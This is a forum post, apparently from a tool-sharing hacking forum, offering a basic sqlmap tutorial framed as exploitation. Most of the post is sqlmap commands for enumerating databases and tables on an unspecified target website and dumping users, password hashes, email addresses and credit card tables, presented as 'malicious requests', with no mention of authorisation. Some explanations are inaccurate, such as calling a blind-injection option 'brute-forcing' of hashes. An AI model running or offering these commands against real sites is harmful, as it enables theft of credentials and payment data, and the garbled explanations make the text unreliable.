[ Tutorial ] 🧨 SQLMAP Exploitation with Basic Tutorial🧨

  • 💌Important Message to All Fellas💌

    💌Important Message to All Fellas : 💌

    ⚠️Thank you for being with us over the past year.
    To support our community, we're now offering an "Account Upgrade" for purchase.
    VIP and Legendary members get special direct downloads without needing to like or reply to threads. Upgrade now to enjoy these benefits!
    HERE Our Official Telegram

    ⛔ Spam: If someone try SCAM you or SPAM Message to you let me know we will ban them

    🏆 Download Error or Missing Link: Click on threads and report them to Our admin will re-upload for you.

    ☣️ Infected or Backdoor/RAT: If you find a virus, please report it to us via Telegram or click report in the threads, and we will completely ban them in 100%

    🎯 Our Plan : Make resource downloads on a private host without using another free upload because easy gone

    ❤️ We try our best to make everyone's shared tools clean and fresh in here, so enjoy with our fellas. ❤️

Download and install sqlmap: The first step is to download and install sqlmap on your system. You can download the tool from the official website. (if you are running with sqlmap on window just download file sqlmap and run with python)

screenshot.png

Identify the target website: The next step is to identify the website you want to test. Once you have identified the website, you can use sqlmap to scan it for vulnerabilities.

Scan the website for vulnerabilities. To scan the website for vulnerabilities, you need to run the following command in the terminal:


command : sqlmap -u <target-website> --dbs

This command will scan the website for vulnerabilities and display a list of available databases.

Select a vulnerable database.

Once you have identified the available databases, you need to select a vulnerable database. To do this, you can run the following command in the terminal:


command : sqlmap -u <target-website> -D <database-name> --tables

This command will display a list of tables available in the selected database.

Dump the table data.


Once you have identified the table you want to dump, you can run the following command in the terminal:

command : sqlmap -u <target-website> -D <database-name> -T <table-name> --dump

This command will dump the table data, including usernames and passwords.


Here are some examples of malicious requests you can craft using sqlmap:

Extracting password hashes:


command : sqlmap -u <target-website> --passwords --hashes

This command will extract password hashes from the website’s database.


Dumping user data

command : sqlmap -u <target-website> -D <database-name> -T users --dump

This command will dump user data from the website’s database.

Brute-forcing password hashes:

command : sqlmap -u <target-website> --passwords --hashes --threads=10 --technique=B

This command will use brute-force techniques to crack password hashes from the website’s database.


Dumping credit card information


command : sqlmap -u <target-website> -D <database-name> -T credit_cards --dump

This command will dump credit card information from the website’s database.


Extracting email addresses


command : sqlmap -u <target-website> -D <database-name> -T users -C email --dump

This command will extract email addresses from the users' table in the website’s database.
 

Forum statistics

Threads
1,766
Messages
35,674
Members
6,809
Latest member
drogbaa
Member time online
456d 14h 35m
Reputation(s)
23